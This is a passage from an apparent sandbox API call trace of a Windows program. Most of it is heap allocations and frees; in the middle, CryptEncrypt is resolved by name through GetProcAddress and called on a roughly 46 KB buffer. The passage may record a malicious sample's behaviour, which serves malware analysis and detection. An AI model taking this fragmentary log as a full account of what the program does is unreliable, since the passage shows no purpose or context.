(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0134.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0134.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0134.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0134.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0134.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0134.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0134.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0134.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0134.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0134.294] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0134.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0134.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0134.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0134.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0134.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0134.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0134.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0134.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0134.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0134.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0134.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0134.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0134.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0134.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0134.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0134.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0134.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0134.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0134.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0134.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0134.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0134.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0134.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0134.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0134.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0134.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0134.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0134.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0134.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0134.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0134.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0134.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0134.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0134.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0134.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0134.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0134.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0134.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0134.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0134.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0134.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0134.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0134.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0134.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0134.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0134.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0134.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0134.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0134.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0134.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0134.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0134.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0134.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0134.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0134.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0134.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0134.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0134.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0134.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0134.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0134.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0134.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0134.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0134.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0134.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0134.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0134.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0134.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0134.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0134.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0134.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0134.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0134.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0134.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0134.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cb498 [0134.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb498, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0134.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0134.298] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0134.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0134.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0134.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0134.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0134.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0134.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0134.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0134.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0134.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0134.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0134.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0134.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0134.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0134.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0134.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0134.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0134.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0134.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0134.299] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49cc1e0*, pdwDataLen=0x144e538*=0xb5e4, dwBufLen=0xb5f0 | out: pbData=0x49cc1e0*, pdwDataLen=0x144e538*=0xb5f0) returned 1 [0134.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0134.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0134.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0134.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0134.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0134.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0134.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0134.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0134.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0134.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0134.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0134.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0134.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0134.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0134.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0134.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0134.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0134.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0134.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0134.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0134.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0134.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0134.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0134.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0134.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0134.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0134.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0134.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0134.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0134.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0134.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0134.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0134.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0134.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0134.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0134.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0134.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0134.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0134.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0134.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0134.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0134.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0134.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0134.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0134.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0134.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0134.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0134.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0134.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0134.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0134.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0134.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36e0 [0134.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0134.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0134.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0134.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0134.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0134.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0134.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0134.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0134.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0134.303] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0134.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0134.303] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 